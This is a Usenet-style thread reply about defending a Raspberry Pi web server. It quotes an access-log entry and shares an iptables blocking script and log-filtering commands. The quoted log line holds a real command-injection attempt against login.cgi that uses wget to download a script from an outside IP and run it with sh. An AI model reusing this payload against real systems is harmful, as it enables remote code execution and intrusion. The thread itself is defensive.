On a sunny day (Thu, 21 Jun 2018 12:40:57 +0200) it happened Andreas Neumann
 wrote in :

>Jan Panteltje wrote:
>
>> I have been watching traffic for a while now to the raspi server after I
>> posted the link, and see Russian and other countries hackers trying
>> things, looking for a way to cause havoc: 31.207.194.8 - -
>> [21/Jun/2018:10:45:37 +0200] "GET
>>
/login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;s
h%20/tmp/r%27$
>> HTTP/1.1" 404 499 "-" "Hello, World"
>
>This is what fail2ban was made for.
>
>No need to fiddle with iptables.

Interesting, I see:
 https://www.fail2ban.org/wiki/index.php/Main_Page

about the same idea as my scripts do,
iptabes is not that hard,
in fact I find it easy to use in scripting:

/usr/local/sbin/ireject
# this is called to add a input deny for an IP addres to iptables,
# and save the configuration.
if [ "$1" = "" ]
then
        echo "Usage: ireject IP_address"
        exit 1
fi
iptables -A INPUT -s $1 -p all -j DROP
iptables -A OUTPUT -s $1 -p all -j REJECT
/usr/sbin/iptables-save > /root/firewall
exit 0



then you can do something like:
tail -n 100 -f /var/log/apache2/access.log | awk '/cgi/{print $1}'
root@raspberrypi:~# tail -n 100 -f /var/log/apache2/access.log | awk
'/cgi/{print $1}'
187.183.152.135
31.207.194.8
31.207.194.8
31.207.194.8
31.207.194.8

shows you everybody who tried the cgi thing,
then pipe it through sort 'unique', then ireject..... to add it to iptables
permanently

there are so many ways...
Its fun to write those scripts.


At startup do (automatically)
iptables-restore < /root/firewall


etc etc
These are just examples OK?

--- SoupGate-Win32 v1.05